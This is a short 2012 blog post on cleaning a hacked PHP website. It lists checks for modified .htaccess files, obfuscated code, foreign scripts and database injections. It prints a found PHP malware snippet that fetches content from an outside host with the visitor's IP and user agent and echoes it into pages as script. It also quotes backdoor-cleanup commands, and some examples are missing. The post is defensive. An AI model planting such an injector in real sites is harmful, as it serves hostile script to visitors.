Archive for the ‘PHP’ Category
forms of website hacking php
March 28th, 2012 | 
Author: If you realize that your php web site has been hacked, which most likely is a result of trojans on your computer, first scan your computer with an anti-malware, then follow these steps:
1.) verify if .htaccess file was modified to allow access to other files with malicious scripts.
2.) verify if there is some hard to read code in any of your php files. For example:
which stands for :
3.) verify if there is a java script which is not yours, included in your files. For example, i found this code in a file:
error_reporting(0); ini_set('display_errors',0); $wp_uagent = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Firefox|MSIE/i', $wp_uagent) && preg_match ('/ NT/i', $wp_uagent))){
if ((!isset($_SERVER['HTTP_X_FORWARDED_FOR'])) && (!isset($_SERVER['HTTP_VIA']))){
$wp_gturl=$wp_rssh."://".$wp_rssh."s".$wp_gt.".com/".$wp_gt."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_uagent);
$wp_cntnt = @file_get_contents($wp_gturl);}
if ( substr($wp_cntnt,1,3) === 'scr' ){
echo $wp_cntnt; }}
which gets the file content from a site, in this case:
http://httpsget.com/get/?ip=YOUR_SITE_IP&referer=YOUR_SITE_DOMAIN&ua=Mozilla%2F5.0+%28Windows+NT+5.1%3B+rv%3A11.0%29+Gecko%2F20100101+Firefox%2F11.0
If the result of the received content starts with
pretty smart 
4.) Also found this in another php file, not exactly sure, but probably a way to delete a file that was used as a back door into your server.
chmod('images/www.imdb.com/',0777);
unlink('images/www.imdb.com/index.php');
rmdir('images/www.imdb.com');
5.) Check for external scripts in your database. If your database was compromised, then you should start to look for included scripts in the fields that store users posts, and proceed to clean them. These can either be done by adding a script reference such as